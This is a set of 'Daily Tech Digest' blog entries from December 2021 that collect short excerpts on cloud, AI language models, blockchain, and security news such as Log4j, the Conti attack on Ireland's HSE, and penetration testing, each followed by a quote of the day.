Daily Tech Digest - December 14, 2021

How eBPF will solve Service Mesh - Goodbye Sidecars

Why have we not created a service mesh in the kernel before? Some people have been semi-jokingly stating that kube-proxy is the original service mesh. There is some truth to that. Kube-proxy is a good example of how close the Linux kernel can get to implementing a service mesh while relying on traditional network-based functionality implemented with iptables. However, it is not enough, the L7 context is missing. Kube-proxy operates exclusively on the network packet level. L7 traffic management, tracing, authentication, and additional reliability guarantees are required for modern applications. Kube-proxy cannot provide this at the network level. eBPF changes this equation. It allows to dynamically extend the functionality of the Linux kernel. We have been using eBPF for Cilium to build a highly efficient network, security, and observability datapath that embeds itself directly into the Linux kernel. Applying this same concept, we can solve service mesh requirements at the kernel level as well. In fact, Cilium already implements a variety of the required concepts such as identity-based security, L3-L7 observability & authorization, encryption, and load-balancing.


General and Scalable Parallelization for Neural Networks

Because different model architectures may be better suited to different parallelization strategies, GSPMD is designed to support a large variety of parallelism algorithms appropriate for different use cases. For example, with smaller models that fit within the memory of a single accelerator, data parallelism is preferred, in which devices train the same model using different input data. In contrast, models that are larger than a single accelerator’s memory capacity are better suited for a pipelining algorithm (like that employed by GPipe) that partitions the model into multiple, sequential stages, or operator-level parallelism (e.g., Mesh-TensorFlow), in which individual computation operators in the model are split into smaller, parallel operators. GSPMD supports all the above parallelization algorithms with a uniform abstraction and implementation. Moreover, GSPMD supports nested patterns of parallelism. For example, it can be used to partition models into individual pipeline stages, each of which can be further partitioned using operator-level parallelism.

What 2022 can hold for the developer experience

To improve the developer experience, and ultimately retain and attract talent, businesses should begin to make changes to reduce the strain placed on developers and help them achieve a healthier work-life balance. The introduction of fairly simple initiatives such as flexi-time and offering mental health days can help to reduce the risk of burnout and show developers that they are valued members of the business whose needs are being listened to. Additionally, organisations could look to provide extra resource and adopt the tools and technology to enable developers to automate parts of their workload. Solutions such as data platforms that make use of machine learning (ML) are a prime example of this. This use of this type of technology would enable developers to easily add automation and predictions to applications without them needing to be experts in ML. Adopting technologies that embed ML capabilities can also help to simplify the process of building, testing, and deploying ML models and speed up the process of integrating them into production applications.

2022 Cybersecurity Risk Mitigation Roadmap For CISO & CIO As Business Drivers

As companies become aware of the need for data protection, their leaders are likely to increase the adoption of encryption; which will find its way into organizations’ basic cyber security architecture in 2022. This will have a ripple effect, and we can expect newer and updated applications providing data encryption solutions to be launched for businesses in the coming year. One of the most disruptive technologies in decades, blockchain technology will be at the heart of shifting from a centralized server-based internet system to transparent cryptographic networks. AI has matured from an experimental topic to mainstream technology. As a result, 2022 will see better accessibility of Artificial Intelligence (AI) based tools for creating robust cybersecurity protocols within an organization. In addition, we expect the new lineup of technology tools to be more cost-effective and yet more effective than ever before. Last but not least, 2022 will see a mix of remote work and on-site physical presence, thereby continuing with the trends of cybersecurity adapted during 2021. 

Intel reports new computing breakthroughs as it pursues Moore’s Law

Intel made the announcement at the IEEE International Electron Devices Meeting (IEDM) 2021. In the press release, Intel talked at length about its three areas of pathfinding and the breakthroughs that prove it’s on track to continue following its roadmap through 2025 and beyond. The company is focusing on several areas of research and reports significant progress in essential scaling technologies that will help it deliver more transistors in its future products. Intel’s engineers have been working on solutions to increase the interconnect density in chip packaging by at least 10 times. Intel also mentioned that in July 2022, at the Intel Accelerated event, it plans to introduce Foveros Direct. This will provide an order of magnitude increase in the interconnect density for 3D stacking through enabling sub-10 micron bump pitches. The tech giant is calling for other manufacturers to work together in order to establish new industry standards and testing procedures, allowing for the creation of a new hybrid bonding chiplet ecosystem.


Designing High-Volume Systems Using Event-Driven Architectures

Thanks to the latest development in Event-Driven Architecture (EDA) platforms such as Kafka and data management techniques such as Data Meshes and Data Fabrics, designing microservices-based applications is now much easier. However, to ensure these microservices-based applications perform at requisite levels, it is important to ensure critical Non-Functional Requirements (NFRs) are taken into consideration during the design time itself. In a series of blog articles, my colleagues Tanmay Ambre, Harish Bharti along with myself are attempting to describe a cohesive approach on Design for NFR. We take a use-case-based approach. In the first installment, we describe designing for “performance” as the first critical NFR. This article focuses on architectural and design decisions that are the basis of high-volume, low-latency processing. To make these decisions clear and easy to understand, we describe their application to a high-level use case of funds transfer. We have simplified the use case to focus mainly on performance.


How Hoppscotch is building an open source ‘API development ecosystem’

The Hoppscotch platform constitutes multiple integrated API development tools, aimed at engineers, software developers, quality assurance (QA) testers, and product managers. It includes a web client, which is pitched as an “online collaborative API playground,” enabling multiple developers or teams to build, test, and share APIs. A separate command line interface (CLI) tool, meanwhile, is designed for integrating automated test runners as part of CI/CD pipelines. And then there is the API documentation generator, which helps developers create, publish, and maintain all the necessary API documentation in real time. Hoppscotch for teams, which is currently in public beta, allows companies to create individual groups for specific use-cases. For example, it can create a team for its entire in-house workforce, where anyone can share APIs and related communications with anyone else. They can also create smaller groups for specific teams, such as QA testers, or for external vendors and partners where sensitive data needs to be kept separate from specific projects they are involved in.


Synthetic Quantum Systems Help Solve Complex Real-World Applications

Quantum Simulation is the most promising use of Pasqal’s QPU, in which the quantum processor is utilized to obtain knowledge about a quantum system of interest. It seems reasonable to employ a quantum system as a computational resource for quantum issues, as Richard Feynman pointed out in the 20th century. Neutral atom quantum processors will aid pure scientific discovery, and there are several sectors of application at the industrial level, such as the creation of novel materials for energy storage and transport, or chemical computations for drug development. “At Pasqal, we are not only scientists, we are not only academic, we industrialize our technology. By working with quantum technology, we want to build and sell a product which is reliable, and which helps to solve complex industrial problems in many contexts,” said Reymond. Among Pasqal’s customers is EDF, the French electricity utility. In the energy sector, Pasqal is working with EDF to develop innovative solutions for smart mobility.


Enterprise email encryption without friction? Yes, it’s possible

It is often (grudgingly) acknowledged in security circles that sometimes security must be partly sacrificed for better usability. But with Echoworx you can have the best of both worlds: a seamless, secure experience for organizations, their partners, vendors, and customers. “Our customers are mostly very large global enterprises in the finance, insurance, manufacturing, retail, and several other verticals,” says Derek Christiansen, Echoworx’s Engagement Manager. “When working with them, we must be sensitive to their needs. We do this by offering like-for-like encryption when we can, and by tailoring the integration of encryption to their existing flows.” ... The only thing that the customer needs to do is direct any email that needs encryption to the company’s infrastructure. “They can use their own data classification. That can be something as simple as an Office 365 rule. It’s also common to use a keyword (e.g., the word ‘secure’) in the email subject to route the message. We also have an optional plugin for Outlook that makes it really easy for senders,” Christiansen notes.


7 Critical Machine Intelligence Exams and The Hidden Link of MLOps with Product Management

The past 12 months have seen many machine learning operations tools gaining prominent popularity. Interestingly, one feature is notably absent or rarely mentioned in the discussion: quality assurance. Academia has already initiated research in machine learning system testing. In addition, several vendors provide data quality support or leverage data testing libraries or data quality frameworks. Automated deployment does exist as well in many tools. But how about canary deployments of models and whatever happened with unit and integration testing in the machine learning universe? Many of these quality assurance proposals originate from an engineering mindset. However, more and more specialists without an engineering background perform a lot of model engineering. Further, recall that a separate person or team frequently runs the quality assurance activities. Supposedly so that engineers can place their trust in others to catch mistakes. More cynical characters might insist that engineers need to be controlled and checked. 



Quote for the day:

"Leaders dig into their business to learn painful realities rather than peaceful illusion." -- Orrin Woodward

Daily Tech Digest - December 13, 2021

Rebranding Data Governance

To successfully implement managed self-service business intelligence at any non-trivial scale, you need data governance. To build and nurture a successful data culture, data governance is an essential part of the success. Despite this fact, and despite the obvious value that data governance can provide, data governance has a bad reputation. Many people – likely including the leaders you need to be your ally if you’re working to build a data culture in your organization – have had negative experiences with data governance in the past, and now react negatively when the topic of data governance is raised. ... Data governance, and building a data culture in general, is as much about people as it is about processes and technology, and that means effective communication is key. Effective communication requires a shared vocabulary, and a shared understanding of the meaning of key words. It may be time to think about rebranding. Not unlike how a corporation with a reputation for all the wrong things might change its name in an effort to leave all those negative connotations behind without really changing its ways, maybe we need to rebrand data governance… at least some of the time.


Crypto Banks: The intersection of traditional finance and DeFi?

It is important to note that crypto banks are very much centralized like traditional banks, something which flies in the face of the true crypto experience, predicated on decentralisation and a reduction in intermediaries. This means that the problems of a banking collapse, hacks and attacks can still impact a person's money and they are not achieving the financial independence that crypto offers. However, it also means that these crypto banks have regulatory standing and the ability to be compliant. They are legal entities that can be subject to laws and legislation; legislation that is constantly evolving to meet the changing of the times. At face value, it appears that these Digital Asset Institutions/"Crypto Banks", are appeasing those new to the space who are willing to join the early majority and move to a more crypto-focused financial way of life. Good UX, simple integrations with existing financial platforms, more financial options in a crypto context, and reliable regulation mean a massive open door for users to flood into if they are looking for this kind of experience.


Breakthrough Proof Clears Path for Quantum AI – Overcoming Threat of “Barren Plateaus”

“All hope of quantum speedup or advantage is lost if you have a barren plateau,” Cerezo said. The crux of the problem is a “vanishing gradient” in the optimization landscape. The landscape is composed of hills and valleys, and the goal is to train the model’s parameters to find the solution by exploring the geography of the landscape. The solution usually lies at the bottom of the lowest valley, so to speak. But in a flat landscape one cannot train the parameters because it’s difficult to determine which direction to take. That problem becomes particularly relevant when the number of data features increases. In fact, the landscape becomes exponentially flat with the feature size. Hence, in the presence of a barren plateau, the quantum neural network cannot be scaled up. The Los Alamos team developed a novel graphical approach for analyzing the scaling within a quantum neural network and proving its trainability. For more than 40 years, physicists have thought quantum computers would prove useful in simulating and understanding quantum systems of particles, which choke conventional classical computers. 


Great Engineering Teams Focus On Milestones Instead of Projects

The problem is that we aspire to unnecessary precision. We don’t need to know exact estimates to ensure engineering focuses on the most important work. The cost of producing exact estimates is wasteful. And it doesn’t even produce the outcome you’re looking for. You don’t need to pretend the feature will be done on June 20. This date is most certainly incorrect anyway. Milestones reduce the complexity of putting together high-level estimates. They give a shorthand that can be good enough for most decision-making, without the overhead of rigorous estimation. Occasionally, I see people succeed at rigorous estimation. But it’s rarely systemic – it’s usually one individual that is good at it. And it relies on them. If they go on vacation for a week, nobody is able to feed their model, and it collapses. While this is a great skill, to me it is the exception that proves the rule. Think of it this way: if one in twenty people can estimate in a high complexity situation, how many could be more successful in a less complex situation?


Better management through anthropology

Almost all business leaders and policymakers could benefit by asking the basic question that dogs anthropology: if a Martian was to land here suddenly and look around, what might they see?” writes Tett. In 1997, when GM was struggling to get teams of engineers from its small car group, its Saturn subsidiary, and Germany’s Opel to create a new vehicle together, the company called in anthropologist Elizabeth Briody to figure out what was wrong. Briody discovered the source of the dysfunction in differing cultural assumptions about meetings. The Opel team expected meetings to be agenda-driven, decision-making sessions; the small car group expected working sessions in which ideas would be shared and discussed; and the Saturn teams expected consensus-building sessions. As a result, the meetings were chaotic and frustrating for everyone. Unfortunately, Briody’s insights came too late, and GM’s senior product development leaders shut down the project. Lastly and most intriguingly, anthropology can help surface what Tett calls social silence. 


“Curiosity is a skill you can develop”: Microsoft UK’s National Technology Officer on driving innovation forwards

“The pandemic experience has been agreat example of how those values truly help our decision-making and our approach to markets. We faced unprecedented demand for our technologies because of the shift to home working. But we only have finite resources, so we worked out where to focus our attention and apply the most value. It was a strong statement, which came directly down from Satya, that we needed to ensure we are preserving life and that our technology was going to play a critical role.” Of the numerous case studies showing how Microsoft has used its pioneering technology to help with the response to the pandemic, Robinson offers two examples. First, Imperial College Healthcare NHS Trust, one of the largest in England, used mixed-reality HoloLens headsets on its COVID-19 wards to enable an entire team of specialists to join doctors virtually on the frontlines of the pandemic, keeping them safe as they helped patients with the virus. Additionally, Microsoft is driving artificial intelligence innovation at Alder Hey Hospital, a children’s hospital in Liverpool, and allowing doctors to make life-changing decisions remotely.


Overcoming Challenges to Automating DevSecOps

When you first move to security automation, you’ll find some security tasks that can easily be automated and others that are harder to fit in. DevSecOps teams will need to use many tools to cover all their bases, but no one wants teams checking lots of different tool outputs. Making it easier to see what’s going on and where risk lies by consolidating security tools and results in a central platform is the way to go. This makes life easier by giving a single pane of glass. Everyone generally agrees that DevOps teams must adopt cybersecurity best practices, but testing takes time. Development teams don’t have time to learn, use and check lots of security tools on top of their existing workload. Automated solutions get to work without any real need for maintenance or management. These solutions trigger tools to work at the right time depending on the outcomes found without any manual input needed. This gives you and your team valuable time back to focus on other important matters. The goal of CI/CD pipelines is fast delivery of build and release steps, typically through automation. 


Unused identities: A growing security threat

The first step towards taking control over your identities and assets’ authorizations is to know what you have. This starts with scanning across all your XaaS environments – that’s SaaS, IaaS, and PaaS – and taking an inventory of which identities have authorization to which assets. This involves ingesting the data from these different environments, normalizing the data into a workable model, and then correlating it with your identities from your identity provider (IDP) like Okta, Ping, Azure AD, or Google. The goal here is to understand the relationship between the identities and assets, assessing a wide range of factors including their usage and if they are right sized to meet the policies/needs of the organization. Are there identities with permissions to assets that have not been used in at least 60 days? This might be a good time to revoke those authorizations. But that’s just a surface-level case. Once you start analyzing your entitlements on a deeper level, you’ll begin to find that there are more permissions granted to your identities than you’re likely to want to admit.


Digital transformation: 4 CIO tips for 2022

To be more agile, innovation and development teams must be closer to the business and have the entire team involved in new product development, testing, and validation. This ensures that their priorities are met from the beginning and no time or resources are wasted. Performance and regression testing and security scanning must be baked in throughout, in real-time, to shorten the development cycle for maximum efficiency. In our organization, that meant moving to weekly sprints and release cycles for our internal infrastructure. Each week, our business reps prioritized what was most important and participated in the testing and validation process. As we worked to roll out our new partner portal, our marketing and support teams were involved from the very beginning, advising the development team and testing features and functionality. By bringing IT and business operations closer together, we’ve been able to balance innovation and operations without having to sacrifice either, even when talent or resources have been limited.


Report Dissects Conti Ransomware Attack on Ireland's HSE

The HSE attack began on March 18 from a malware infection on an HSE workstation - dubbed "Patient Zero Workstation" - as the result of a user clicking and opening a malicious Microsoft Excel file that was attached to a phishing email sent to the user on March 16. "After gaining unauthorized access to the HSE’s IT environment on March 18, the attacker continued to operate in the environment over an eight week period until the detonation of the Conti ransomware on May 14," the report says. "This included compromising and abusing a significant number of accounts with high levels of privileges, compromising a significant number of servers, exfiltrating data and moving laterally to statutory and voluntary hospitals." ... "There were several detections of the attacker’s activity prior to May 14, but these did not result in a cybersecurity incident and investigation initiated by the HSE and as a result, opportunities to prevent the successful detonation of the ransomware were missed."



Quote for the day:

"Leadership does not always wear the harness of compromise." -- Woodrow Wilson

Daily Tech Digest - December 12, 2021

AWS Among 12 Cloud Services Affected by Flaws in Eltima SDK

USB Over Ethernet enables sharing of multiple USB devices over Ethernet, so that users can connect to devices such as webcams on remote machines anywhere in the world as if the devices were physically plugged into their own computers. The flaws are in the USB Over Ethernet function of the Eltima SDK, not in the cloud services themselves, but because of code-sharing between the server side and the end user apps, they affect both clients – such as laptops and desktops running Amazon WorkSpaces software – and cloud-based machine instances that rely on services such as Amazon Nimble Studio AMI, that run in the Amazon cloud. The flaws allow attackers to escalate privileges so that they can launch a slew of malicious actions, including to kick the knees off the very security products that users depend on for protection. Specifically, the vulnerabilities can be used to “disable security products, overwrite system components, corrupt the operating system or perform malicious operations unimpeded,” SentinelOne senior security researcher Kasif Dekel said in a report published on Tuesday.


Rust in the Linux Kernel: ‘Good Enough’

When we first looked at the idea of Rust in the Linux kernel, it was noted that the objective was not to rewrite the kernel’s 25 million lines of code in Rust, but rather to augment new developments with the more memory-safe language than the standard C normally used in Linux development. Part of the issue with using Rust is that Rust is compiled based on LLVM, as opposed to GCC, and subsequently supports fewer architectures. This is a problem we saw play out when the Python cryptography library replaced some old C code with Rust, leading to a situation where certain architectures would not be supported. Hence, using Rust for drivers would limit the impact of this particular limitation. Ojeda further noted that the Rust for Linux project has been invited to a number of conferences and events this past year, and even garnered some support from Red Hat, which joins Arm, Google, and Microsoft in supporting the effort. According to Ojeda, Red Hat says that “there is interest in using Rust for kernel work that Red Hat is considering.”


DeepMind tests the limits of large AI language systems with 280-billion-parameter model

DeepMind, which regularly feeds its work into Google products, has probed the capabilities of this LLMs by building a language model with 280 billion parameters named Gopher. Parameters are a quick measure of a language’s models size and complexity, meaning that Gopher is larger than OpenAI’s GPT-3 (175 billion parameters) but not as big as some more experimental systems, like Microsoft and Nvidia’s Megatron model (530 billion parameters). It’s generally true in the AI world that bigger is better, with larger models usually offering higher performance. DeepMind’s research confirms this trend and suggests that scaling up LLMs does offer improved performance on the most common benchmarks testing things like sentiment analysis and summarization. However, researchers also cautioned that some issues inherent to language models will need more than just data and compute to fix. “I think right now it really looks like the model can fail in variety of ways,” said Rae.


2022 transformations promise better builders, automation, robotics

The Great Resignation is real, and it has affected the logistics industry more than anyone realizes. People don’t want low-paying and difficult jobs when there’s a global marketplace where they can find better work. Automation will be seen as a way to address this, and in 2022, we will see a lot of tech VC investment in automation and robotics. Some say SpaceX and Virgin can deliver cargo via orbit, but I think that’s ridiculous. What we need, (and what I think will be funded in 2022, are more electric and autonomous vehicles like eVTOL, a company that is innovating the “air mobility” market. According to eVTOL’s website, the U.S. Department of Defense has awarded $6 million to the City of Springfield, Ohio, for a National Advanced Air Mobility Center of Excellence. ... In 2022 transformations, grocery will cease to be an in-store retail experience only, and the sector will be as virtual and digitally-driven as the best of them. Things get interesting when we combine locker pickup, virtual grocery, and automated last-mile delivery using autonomous vehicles that can deliver within a mile of the warehouse or store.


Penetration testing explained: How ethical hackers simulate attacks

In a broad sense, a penetration test works in exactly the same way that a real attempt to breach an organization's systems would. The pen testers begin by examining and fingerprinting the hosts, ports, and network services associated with the target organization. They will then research potential vulnerabilities in this attack surface, and that research might suggest further, more detailed probes into the target system. Eventually, they'll attempt to breach their target's perimeter and get access to protected data or gain control of their systems. The details, of course, can vary a lot; there are different types of penetration tests, and we'll discuss the variations in the next section. But it's important to note first that the exact type of test conducted and the scope of the simulated attack needs to be agreed upon in advance between the testers and the target organization. A penetration test that successfully breaches an organization's important systems or data can cause a great deal of resentment or embarrassment among that organization's IT or security leadership


EV charging in underground carparks is hard. Blockchain to the rescue

According to Bharadwaj, the concrete and steel environment effectively acted as a “Faraday cage,” which meant that the EV chargers wouldn’t talk to people’s mobile phones when they tried to initiate charging. You could find yourself stranded, unable to charge your car. “So we had to innovate.” ... As with any EV charging, a payment app connects your car to the EV charger. With Xeal, the use of NFC means the only time you need the Internet is to download the app in the first instance to create a profile that includes their personal and vehicle information and payment details. You then receive a cryptographic token on your mobile phone that authenticates your identity and enables you to access all of Xeal’s public charging stations. The token is time-bound, which means it dissolves after use. To charge your car, you hold your phone up to the charger. Your mobile reads the cryptographic token, automatically bringing up an NFC scanner. It opens the app, authenticates your charging session, starts scanning, and within milliseconds, the charging session starts.


Top 8 AI and ML Trends to Watch in 2022

The scarcity of skilled AI developers or engineers stands as a major barrier to adopting AI technology in many companies. No-code and low-code technologies come to the rescue. These solutions aim to offer simple interfaces, in theory, to develop highly complex AI systems. Today, web design and no-code user interface (UI) tools let users create web pages simply by dragging and dropping graphical elements together. Similarly, no-code AI technology allows developers to create intelligent AI systems by simply merging different ready-made modules and feeding them industrial domain-specific data. Furthermore, NLP, low-code, and no-code technologies will soon enable us to instruct complex machines with our voice or written instructions. These advancements will result in the “democratization” of AI, ML, and data technologies. ... In 2022, with the aid of AI and ML technologies, more businesses will automate multiple yet repetitive processes that involve large volumes of information and data. In the coming years, an increased rate of automation can be seen in various industries using robotic process automation (RPA) and intelligent business process management software (iBPMS). 


The limitations of scaling up AI language models

Large language models like OpenAI’s GPT-3 show an aptitude for generating humanlike text and code, automatically writing emails and articles, composing poetry, and fixing bugs in software. But the dominant approach to developing these models involves leveraging massive computational resources, which has consequences. Beyond the fact that training and deploying large language models can incur high technical costs, the requirements put the models beyond the reach of many organizations and institutions. Scaling also doesn’t resolve the major problem of model bias and toxicity, which often creeps in from the data used to train the models. In a panel during the Conference on Neural Information Processing Systems (NeurIPS) 2021, experts from the field discussed how the research community should adapt as progress in language models continues to be driven by scaled-up algorithms. The panelists explored how to ensure that smaller institutions and can meaningfully research and audit large-scale systems, as well as ways that they can help to ensure that the systems behave as intended.


Here are three ways distributed ledger technology can transform markets

While firms have narrowed their scope to address more targeted pain points, the increased digitalisation of assets is helping to drive interest in the adoption of DLT in new ways. Previous talk of mass disruption of the financial system has given way to more realistic, but still transformative, discussions around how DLT could open doors to a new era of business workflows, enabling transactional exchanges of assets and payments to be recorded, linked, and traced throughout their entire lifecycle. DLT’s true potential rests with its ability to eliminate traditional “data silos”, so that parties no longer need to build separate recording systems, each holding a copy of their version of “the truth”. This inefficiency leads to time delays, increased costs and data quality issues. In addition, the technology can enhance security and resilience, and would give regulators real-time access to ledger transactions to monitor and mitigate risk more effectively. In recent years, we have been pursuing a number of DLT-based opportunities, helping us understand where we believe the technology can deliver maximum value while retaining the highest levels of risk management.


To identity and beyond—One architect's viewpoint

Simple is often better: You can do (almost) anything with technology, but it doesn't mean you should. Especially in the security space, many customers overengineer solutions. I like this video from Google’s Stripe conference to underscore this point. People, process, technology: Design for people to enhance process, not tech first. There are no "perfect" solutions. We need to balance various risk factors and decisions will be different for each business. Too many customers design an approach that their users later avoid. Focus on 'why' first and 'how' later: Be the annoying 7-yr old kid with a million questions. We can't arrive at the right answer if we don't know the right questions to ask. Lots of customers make assumptions on how things need to work instead of defining the business problem. There are always multiple paths that can be taken. Long tail of past best practices: Recognize that best practices are changing at light speed. 



Quote for the day:

"Eventually relationships determine the size and the length of leadership." -- John C. Maxwell

Daily Tech Digest - December 11, 2021

Why a Little-Known Blockchain-Based Identity Project in Ethiopia Should Concern Us All

We have countless examples of the dangers of national ID schemes in general, including from Kenya, Uganda, Pakistan, India and elsewhere. But while national ID schemes can be highly problematic, building them on blockchain could be catastrophic. Putting aside the very obvious logistical hurdles, including very low internet penetration rates in Ethiopia (that are significantly lower in more rural regions) and the displacement of children from schools due to ongoing conflict and humanitarian challenges, there are much deeper problems with Hoskinson’s plans. Blockchain is fundamentally an accounting technology designed to track and trace digital assets through an immutable ledger of transactions. Blockchain-based ID schemes similarly treat identity as a transactional, mathematical problem. The more transactions, the more profitable for the network. There are also serious privacy and data protection concerns with the logging of all this metadata. While proponents of blockchain-based ID claim that concerns are unfounded if the system is designed correctly and identity documents are kept off ledger, the dangers of metadata in this context are well-documented.


Everyone is burned out. That's becoming a security nightmare

In many organisations, it's cybersecurity staff who are there to counter activity that could make the network vulnerable to cyberattacks – but according to the paper, cybersecurity professionals are more burned out than other workers. The research suggests that 84% of security professionals are feeling burned out, compared with 80% of other workers. And when cybersecurity employees are burned out, they're more than likely to describe themselves as "completely checked out" and "doing the bare minimum at work" – something that one in 10 cybersecurity professionals described as their state of mind compared with one in 20 of other employees. That attitude could easily result in security threats being missed or flaws not being fixed in time, something that could put the whole company at risk from cyber incidents. "Pandemic-fueled burnout – and resultant workplace apathy and distraction – has emerged as the next significant security risk," said Jeff Shiner, chief executive officer at 1Password. "It's particularly surprising to find that burned-out security leaders, charged with protecting businesses, are doing a far worse job of following security guidelines – and putting companies at risk".


How Can We Get​ Blockchains to Talk to Each Other?

Solving this problem is a booming area of research though, and last month Schulte and his colleagues presented a potential workaround at the IEEE International Conference on Blockchain Computing and Applications. Their approach relies on blockchain relays, which are essentially smart contracts running on one blockchain that can verify events on another blockchain. If a user wants to transfer an asset they first destroy, or “burn,” it on the source blockchain, which is typically done by sending the asset to a user address that doesn’t exist. This transaction also includes details of the asset and which blockchain and user they want to send it to. Third parties monitor the source blockchain for these burn transactions and then send them to the relay for a small reward, which verifies the burn transaction and recreates the asset on the new blockchain. The challenge, says Schulte, is that these verification processes invoke transaction fees that can quickly make the approach impractical. So they created a verification on-demand system where the relay assumes transactions are valid unless they are disputed. 


DeFi architect Andre Cronje said it’s time to give up on the inaccurate term “decentralized finance”

“We aren’t decentralized, the old guard will keep trying to use it as their “attack” vector,” he added in a disheartening tone, as he proposed a couple of alternative coined terms. According to Cronje, “open finance” or “web3 finance” present some better-suited options that would describe the sector more accurately. Cronje’s unreserved commentary is tough to challenge–thanks to his vast experience and track record. After launching Yearn in 2020, Andre made a move that granted him a somewhat legendary status in the crypto community–he chose to distribute all YFI tokens amongst liquidity providers, without withholding any for himself, or the Yearn development fund. Some of Cronje’s recent projects include the decentralized stablecoin exchange protocol Fixed Forex, and Keep3r Network, which facilitates the interaction between those looking for external developers and job executors–known as Keepers. He was also involved in developing Fantom–a highly scalable Layer 1 blockchain.


DevOps Teams Struggling to Keep Secrets

From Carson’s perspective, secrets management is the ability to move away from hardcoded passwords or static keys to just-in-time privileges or one-time-use passwords so even when comprised they cannot be used. “Many privileged access management solutions that protected privileged access for years have extended functionality to developers to help move the value into DevOps so they can manage credentials for applications, databases, CI/CD tools and services without causing friction in the development process,” he said. Approaches like privileged access security helps enable API-as-a-service and provides instant availability of secrets, SSH keys, certificates, API keys and tokens. Bambenek added the problem isn’t choosing a secrets management process or tool, but rather that they aren’t in place at all. “Pick something that will keep keys and secrets out of public cloud repositories that developers will use that allows for quick and easy rotation of keys as the need arises,” he said. 


DeepMind debuts massive language A.I. that approaches human-level reading comprehension

DeepMind’s language model, which it calls Gopher, was significantly more accurate than these existing ultra-large language models on many tasks, particularly answering questions about specialized subjects like science and the humanities, and equal or nearly equal to them in others, such as logical reasoning and mathematics, according to the data DeepMind published. This was the case despite the fact that Gopher is smaller than some ultra-large language software. Gopher has some 280 billion different parameters, or variables that it can tune. That makes it larger than OpenAI’s GPT-3, which has 175 billion. But it is smaller than a system that Microsoft and Nivida collaborated on earlier this year, called Megatron, that has 535 billion, as well as ones constructed by Google, with 1.6 trillion parameters, and Alibaba, with 10 trillion. Ultra-large language models have big implications for business: they have already lead to more fluent chatbots and digital assistants, more accurate translation software, better search engines, and programs that can summarize complex documents.


Dangerous “Log4j” security vulnerability affects everything from Apple to Minecraft

This vulnerability was discovered by Chen Zhaojun of the Alibaba Cloud Security Team. Any service that logs user-controlled strings was vulnerable to the exploit. The logging of user-controlled strings is a common practice by system administrators in order to spot potential platform abuse, though those strings should then be “sanitized” — the process of cleaning user input to ensure that there is nothing harmful to the software being submitted. The exploit has been dubbed “Log4Shell”, as it’s an unauthenticated RCE vulnerability that allows for total system takeover. There’s already a proof-of-concept exploit online, and it’s ridiculously easy to demonstrate that it works through the use of DNS logging software. If you remember the Heartbleed vulnerability from a number of years ago, Log4Shell definitely gives it a run for its money when it comes to severity. “Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come,” the Randori Attack Team said in their blog today.


It’s time for tech to embrace security by design

Basic cybersecurity hygiene is the key to protecting your devices against the most common types of malware, but we also need security built into technology to prevent these sophisticated cyberattacks. The Secret Service is certainly best known for protecting the president. But its other primary mission is to safeguard the nation’s financial infrastructure and payment systems to preserve the integrity of the economy from a wide range of financial and electronic crimes, including U.S. counterfeit currency, bank and financial institution fraud, illicit financing operations, identity theft, access device fraud and cybercrimes. With the prevalence of mobile devices in today’s world, that means that, as the Department of Homeland Security (DHS) recommends, “users should avoid — and enterprises should prohibit on their devices — sideloading of apps and the use of unauthorized app stores.” The pandemic has been a boon to cybercriminals, taking “advantage of an opportunity to profit from our dependence on technology to go on an internet crime spree,” said Paul Abbate, deputy director of the Federal Bureau of Investigation.


Simulating matter on the quantum scale with AI

Although DFT proves a mapping exists, for more than 50 years the exact nature of this mapping between electron density and interaction energy — the so-called density functional — has remained unknown and has to be approximated. Despite the fact that DFT intrinsically involves a level of approximation, it is the only practical method to study how and why matter behaves in a certain way at the microscopic level and has therefore become one of the most widely used techniques in all of science. Over the years, researchers have proposed many approximations to the exact functional with varying levels of accuracy. Despite their popularity, all of these approximations suffer from systematic errors because they fail to capture certain crucial mathematical properties of the exact functional. By expressing the functional as a neural network and incorporating these exact properties into the training data, we learn functionals free from important systematic errors — resulting in a better description of a broad class of chemical reactions.


A Paradigm Shift in App Delivery

As the shift to cloud accelerates, organizations are also looking for ways to reduce risk as they deliver apps over the cloud. “I think recently the pandemic has made every digital business an experience-delivery company,” Gupta said. “If you talked about transition to cloud and SaaS a few years back, everybody was going towards it. But the question now is how fast I can go, and how confidently while reducing the risk I can achieve with a hyper transition to the cloud and it’s [creation of] a lot of new opportunities and challenges.” Another main reason organizations are making the shift to cloud-based deployments is to benefit from “auto-scaling,” Gupta said. “But the challenge with auto-scaling is that you have to do a lot of guesswork about CPU and memory… and if your intent or requirements change, you must go back to square one and repeat that cycle multiple times,” Gupta said. This is among the reasons why organizations are increasingly rethinking their application-delivery approaches. “This is the time to look at your application-delivery infrastructure and to take a new radical approach to build a new application delivery and security infrastructure,” Gupta said.



Quote for the day:

"It is time for a new generation of leadership to cope with new problems and new opportunities for there is a new world to be won." -- John E Kennedy

Daily Tech Digest - December 10, 2021

App Modernization: Why ‘Lift and Shift’ Isn’t Good Enough

App modernization is about creating a set of best practices and competency building. It’s about continuous learning — which is very attractive for highly recruitable tech workers. Kerry Schaffer is senior director of information technology at OneMagnify; her job includes overseeing data center operations. In 2020, OneMagnify had a very tight customer deadline to deliver a feature for taking reservations for the pre-launch of an iconic vehicle. With microservices hosted by the Tanzu application, Schaffer’s team just had to make a few continuous integration/continuous delivery (CI/CD) deployments. The team delivered on time and the customer got double the reservations it anticipated. “The fact that it was on a scalable platform meant that we were able to serve all the customers without any outages,” Schaffer said. Since then, she added, the same customer has launched four other vehicle reservation systems, and “because we wrote that in a modern way, we’ve been able to reuse all that architecture.”


New research shows IoT and OT innovation is critical to business but comes with significant risks

The Ponemon research shows us that a good percentage of the surveyed respondents are encountering IoT and OT attacks. Nearly 40 percent of respondents told us that they’ve experienced attacks where the IoT and OT devices were either the actual target of the attack (for example, to halt production using human-operated ransomware) or were used to conduct broader attacks (such as lateral movement, evade detection, and persist). Most respondents felt these types of attacks will increase in the years to come. 39 percent of respondents experienced a cyber incident in the past two years where an IoT or OT device was the target of the attack; 35 percent of respondents say in the past two years their organizations experienced a cyber incident where an IoT device was used by an attacker to conduct a broader attack; 63 percent of respondents say the volume of attacks will significantly increase. One thing to keep in mind with these last three statistics is that the study also showed that customers have low to average confidence in their ability to detect when IoT and OT devices have been compromised.


Exploring the paradoxical rise and uncertain future of crypto

